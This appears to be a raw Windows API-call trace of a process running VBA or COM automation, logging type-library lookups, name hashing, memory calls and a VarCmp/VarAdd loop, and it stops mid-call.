[0042.078] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182c38 | out: ppvObject=0x182c38*=0x0) returned 0x80004002 [0042.078] IUnknown:AddRef (This=0x6ceeeb8) returned 0x7 [0042.078] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182c30, pDummy=0x10 | out: ppTypeAttr=0x182c30, pDummy=0x10) returned 0x0 [0042.078] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.078] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x182c28 | out: pRefType=0x182c28*=0x1302) returned 0x0 [0042.078] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x182c40 | out: ppTInfo=0x182c40*=0x6ceef68) returned 0x0 [0042.078] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.078] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x182c30, pDummy=0x182c10 | out: ppTypeAttr=0x182c30, pDummy=0x182c10*=0x182c50) returned 0x0 [0042.078] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.078] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x182c28 | out: pRefType=0x182c28*=0xf) returned 0x0 [0042.078] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x182c40 | out: ppTInfo=0x182c40*=0x6bbd1c8) returned 0x0 [0042.078] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.078] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x182c30, pDummy=0x182c08 | out: ppTypeAttr=0x182c30, pDummy=0x182c08*=0xf) returned 0x0 [0042.078] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.078] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.078] ITypeInfo:RemoteGetDocumentation (in: This=0x6ceeeb8, memid=0, refPtrFlags=0x182cb0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x800000000 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x800000000) returned 0x0 [0042.078] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Value", cchWideChar=6, lpMultiByteStr=0x182bc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Value", lpUsedDefaultChar=0x0) returned 6 [0042.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0042.079] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.079] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.079] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.079] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182f18, pDummy=0x5e608d0 | out: ppTypeAttr=0x182f18, pDummy=0x5e608d0*=0x0) returned 0x0 [0042.079] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.079] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.079] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.079] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.079] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x1824b0, pDummy=0x0 | out: ppTypeAttr=0x1824b0, pDummy=0x0) returned 0x0 [0042.079] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.079] ITypeComp:RemoteBind (in: This=0x6990970, szName="b", lHashVal=0x101059, wFlags=0x5, ppTInfo=0x182b88, pDescKind=0x182b9c, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b88*=0x0, pDescKind=0x182b9c*=0, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a01c6, cbMultiByte=2, lpWideCharStr=0x182bd0, cchWideChar=3 | out: lpWideCharStr="b") returned 2 [0042.079] ITypeComp:RemoteBind (in: This=0x6992860, szName="b", lHashVal=0x101059, wFlags=0x5, ppTInfo=0x182b88, pDescKind=0x182b9c, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b88*=0x0, pDescKind=0x182b9c*=0, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a01c6, cbMultiByte=2, lpWideCharStr=0x182bd0, cchWideChar=3 | out: lpWideCharStr="b") returned 2 [0042.079] ITypeComp:RemoteBind (in: This=0x6992e00, szName="b", lHashVal=0x101059, wFlags=0x5, ppTInfo=0x182b88, pDescKind=0x182b9c, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b88*=0x0, pDescKind=0x182b9c*=0, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b") returned 0x101059 [0042.079] strcpy_s (in: _Dst=0x182b30, _DstSize=0x2, _Src="b" | out: _Dst="b") returned 0x0 [0042.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182b30, cbMultiByte=2, lpWideCharStr=0x182980, cchWideChar=2 | out: lpWideCharStr="b") returned 2 [0042.079] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.079] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="b", lHashVal=0x59, pfName=0x182a50, pBstrLibName=0x182980 | out: pfName=0x182a50*=0, pBstrLibName=0x182980) returned 0x0 [0042.079] IUnknown:Release (This=0x6990960) returned 0xa [0042.079] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.079] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="b", lHashVal=0x59, pfName=0x182a50, pBstrLibName=0x182980 | out: pfName=0x182a50*=0, pBstrLibName=0x182980) returned 0x0 [0042.079] IUnknown:Release (This=0x6992850) returned 0x11 [0042.079] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.079] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="b", lHashVal=0x59, pfName=0x182a50, pBstrLibName=0x182980 | out: pfName=0x182a50*=0, pBstrLibName=0x182980) returned 0x0 [0042.079] IUnknown:Release (This=0x6992df0) returned 0xc [0042.080] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.080] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="b", lHashVal=0x59, pfName=0x182a50, pBstrLibName=0x182980 | out: pfName=0x182a50*=0, pBstrLibName=0x182980) returned 0x0 [0042.080] IUnknown:Release (This=0x6992580) returned 0x6 [0042.080] _mbscmp (_Str1=0x38a01c6, _Str2=0x5a601c6) returned 1 [0042.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a01c6, cbMultiByte=2, lpWideCharStr=0x182bd0, cchWideChar=3 | out: lpWideCharStr="b") returned 2 [0042.080] ITypeComp:RemoteBind (in: This=0x6992590, szName="b", lHashVal=0x101059, wFlags=0x5, ppTInfo=0x182b88, pDescKind=0x182b9c, ppFuncDesc=0x182ba0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b88*=0x0, pDescKind=0x182b9c*=0, ppFuncDesc=0x182ba0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a01c6, cbMultiByte=2, lpWideCharStr=0x182bd0, cchWideChar=3 | out: lpWideCharStr="b") returned 2 [0042.080] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="b", lHashVal=0x101059, wFlags=0x5, ppTInfo=0x182b88, pDescKind=0x182b9c, ppFuncDesc=0x182ba0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b88*=0x0, pDescKind=0x182b9c*=0, ppFuncDesc=0x182ba0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.080] IMalloc:Alloc (This=0x7feffc15380, cb=0x9) returned 0x6c348d0 [0042.080] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x2, _Src=0x38a01c6 | out: _Dst=0x6c348d0) returned 0x0 [0042.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_b") returned 0x10a202 [0042.080] strcpy_s (in: _Dst=0x182ce0, _DstSize=0x9, _Src="_B_var_b" | out: _Dst="_B_var_b") returned 0x0 [0042.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182ce0, cbMultiByte=9, lpWideCharStr=0x182b30, cchWideChar=9 | out: lpWideCharStr="_B_var_b") returned 9 [0042.080] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.080] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_b", lHashVal=0x10a202, pfName=0x182c00, pBstrLibName=0x182b30 | out: pfName=0x182c00*=0, pBstrLibName=0x182b30) returned 0x0 [0042.080] IUnknown:Release (This=0x6990960) returned 0xa [0042.080] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.080] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_B_var_b", lHashVal=0x10a202, pfName=0x182c00, pBstrLibName=0x182b30 | out: pfName=0x182c00*=0, pBstrLibName=0x182b30) returned 0x0 [0042.080] IUnknown:Release (This=0x6992850) returned 0x11 [0042.080] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.080] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_B_var_b", lHashVal=0x10a202, pfName=0x182c00, pBstrLibName=0x182b30 | out: pfName=0x182c00*=0, pBstrLibName=0x182b30) returned 0x0 [0042.080] IUnknown:Release (This=0x6992df0) returned 0xc [0042.080] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.080] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_B_var_b", lHashVal=0x10a202, pfName=0x182c00, pBstrLibName=0x182b30 | out: pfName=0x182c00*=0, pBstrLibName=0x182b30) returned 0x0 [0042.080] IUnknown:Release (This=0x6992580) returned 0x6 [0042.080] IUnknown:AddRef (This=0x6993ed0) returned 0x7 [0042.080] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="_B_var_b", lHashVal=0x10a202, pfName=0x182c00, pBstrLibName=0x182b30 | out: pfName=0x182c00*=0, pBstrLibName=0x182b30) returned 0x0 [0042.080] IUnknown:Release (This=0x6993ed0) returned 0x6 [0042.080] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.080] IUnknown:Release (This=0x6990960) returned 0xa [0042.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505086a, cbMultiByte=9, lpWideCharStr=0x182b90, cchWideChar=10 | out: lpWideCharStr="_B_var_b") returned 9 [0042.080] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_b", lHashVal=0x10a202, wFlags=0x5, ppTInfo=0x182b48, pDescKind=0x182b5c, ppFuncDesc=0x182b60, ppVarDesc=0x62005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b48*=0x0, pDescKind=0x182b5c*=0, ppFuncDesc=0x182b60, ppVarDesc=0x62005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.080] _mbscpy_s (in: _Dst=0x182d50, _DstSizeInBytes=0x2, _Src=0x38a01c6 | out: _Dst=0x182d50) returned 0x0 [0042.080] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182d08 | out: ppvObject=0x182d08*=0x0) returned 0x80004002 [0042.080] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182d00 | out: ppvObject=0x182d00*=0x0) returned 0x80004002 [0042.081] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.081] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182f58, pDummy=0x0 | out: ppTypeAttr=0x182f58, pDummy=0x0) returned 0x0 [0042.081] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.081] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.081] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.081] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.081] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x1824f0, pDummy=0x0 | out: ppTypeAttr=0x1824f0, pDummy=0x0) returned 0x0 [0042.081] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.081] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.081] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.081] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182560, pDummy=0x0 | out: ppTypeAttr=0x182560, pDummy=0x0) returned 0x0 [0042.081] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.081] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.081] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.081] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x1827a0, pDummy=0x0 | out: ppTypeAttr=0x1827a0, pDummy=0x0) returned 0x0 [0042.081] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.081] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.081] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.081] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182a00, pDummy=0x0 | out: ppTypeAttr=0x182a00, pDummy=0x0) returned 0x0 [0042.081] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.081] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183070 | out: ppvObject=0x183070*=0x0) returned 0x80004002 [0042.081] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183078 | out: ppvObject=0x183078*=0x0) returned 0x80004002 [0042.081] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x183068 | out: ppvObject=0x183068*=0x6ceee08) returned 0x0 [0042.081] ITypeInfo2:GetTypeKind (in: This=0x6ceee08, pTypeKind=0x1830c4 | out: pTypeKind=0x1830c4*=5) returned 0x0 [0042.081] IUnknown:Release (This=0x6ceee08) returned 0x5 [0042.081] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183078 | out: ppvObject=0x183078*=0x0) returned 0x80004002 [0042.082] IUnknown:AddRef (This=0x6ceeeb8) returned 0x7 [0042.082] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x183070, pDummy=0x10 | out: ppTypeAttr=0x183070, pDummy=0x10) returned 0x0 [0042.082] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.082] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x183068 | out: pRefType=0x183068*=0x1302) returned 0x0 [0042.082] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x183080 | out: ppTInfo=0x183080*=0x6ceef68) returned 0x0 [0042.082] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.082] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x183070, pDummy=0x183050 | out: ppTypeAttr=0x183070, pDummy=0x183050*=0x183090) returned 0x0 [0042.082] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.082] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x183068 | out: pRefType=0x183068*=0xf) returned 0x0 [0042.082] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x183080 | out: ppTInfo=0x183080*=0x6bbd1c8) returned 0x0 [0042.082] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.082] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x183070, pDummy=0x183048 | out: ppTypeAttr=0x183070, pDummy=0x183048*=0xf) returned 0x0 [0042.082] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.082] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.082] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.082] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.082] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0x20a) returned 0x6d10430 [0042.082] IMalloc:Free (This=0x7feffc15380, pv=0x6ccfd30) [0042.082] GetCurrentProcess () returned 0xffffffffffffffff [0042.082] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0042.082] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0042.082] GetCurrentProcess () returned 0xffffffffffffffff [0042.082] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0042.082] GetCurrentProcess () returned 0xffffffffffffffff [0042.082] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0042.082] GetCurrentProcess () returned 0xffffffffffffffff [0042.082] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0042.082] GetCurrentProcess () returned 0xffffffffffffffff [0042.082] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0042.082] GetCurrentProcess () returned 0xffffffffffffffff [0042.082] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0042.082] GetCurrentProcess () returned 0xffffffffffffffff [0042.082] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0042.082] GetCurrentProcess () returned 0xffffffffffffffff [0042.082] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0042.082] GetCurrentProcess () returned 0xffffffffffffffff [0042.082] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0042.082] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.082] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184168 | out: ppvObject=0x184168*=0x0) returned 0x80004002 [0042.082] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184160 | out: ppvObject=0x184160*=0x0) returned 0x80004002 [0042.082] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.083] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.083] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184168 | out: ppvObject=0x184168*=0x0) returned 0x80004002 [0042.083] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184160 | out: ppvObject=0x184160*=0x0) returned 0x80004002 [0042.083] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.083] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.083] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184168 | out: ppvObject=0x184168*=0x0) returned 0x80004002 [0042.083] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184160 | out: ppvObject=0x184160*=0x0) returned 0x80004002 [0042.083] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.083] IUnknown:AddRef (This=0x6bb49d0) returned 0x4 [0042.083] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184168 | out: ppvObject=0x184168*=0x0) returned 0x80004002 [0042.083] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184160 | out: ppvObject=0x184160*=0x0) returned 0x80004002 [0042.083] IUnknown:Release (This=0x6bb49d0) returned 0x3 [0042.083] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7eb38, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.090] VarAdd (in: pvarLeft=0x6b7ea48, pvarRight=0x6b7ea78, pvarResult=0x6b7ea60 | out: pvarResult=0x6b7ea60) returned 0x0 [0042.090] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7eac8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.090] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7eb20, pvarResult=0x6b7eaf8 | out: pvarResult=0x6b7eaf8) returned 0x0 [0042.090] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7ea78, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.091] VarAdd (in: pvarLeft=0x6b7e988, pvarRight=0x6b7e9b8, pvarResult=0x6b7e9a0 | out: pvarResult=0x6b7e9a0) returned 0x0 [0042.091] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7ea08, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.091] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7ea60, pvarResult=0x6b7ea38 | out: pvarResult=0x6b7ea38) returned 0x0 [0042.091] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e9b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.091] VarAdd (in: pvarLeft=0x6b7e8c8, pvarRight=0x6b7e8f8, pvarResult=0x6b7e8e0 | out: pvarResult=0x6b7e8e0) returned 0x0 [0042.091] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e948, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.091] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e9a0, pvarResult=0x6b7e978 | out: pvarResult=0x6b7e978) returned 0x0 [0042.091] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e8f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.092] VarAdd (in: pvarLeft=0x6b7e808, pvarRight=0x6b7e838, pvarResult=0x6b7e820 | out: pvarResult=0x6b7e820) returned 0x0 [0042.092] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e888, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.092] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e8e0, pvarResult=0x6b7e8b8 | out: pvarResult=0x6b7e8b8) returned 0x0 [0042.092] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e838, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.092] VarAdd (in: pvarLeft=0x6b7e748, pvarRight=0x6b7e778, pvarResult=0x6b7e760 | out: pvarResult=0x6b7e760) returned 0x0 [0042.092] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e7c8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.092] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e820, pvarResult=0x6b7e7f8 | out: pvarResult=0x6b7e7f8) returned 0x0 [0042.092] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e778, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.093] VarAdd (in: pvarLeft=0x6b7e688, pvarRight=0x6b7e6b8, pvarResult=0x6b7e6a0 | out: pvarResult=0x6b7e6a0) returned 0x0 [0042.093] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e708, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.093] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e760, pvarResult=0x6b7e738 | out: pvarResult=0x6b7e738) returned 0x0 [0042.093] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e6b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.093] VarAdd (in: pvarLeft=0x6b7e5c8, pvarRight=0x6b7e5f8, pvarResult=0x6b7e5e0 | out: pvarResult=0x6b7e5e0) returned 0x0 [0042.093] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e648, 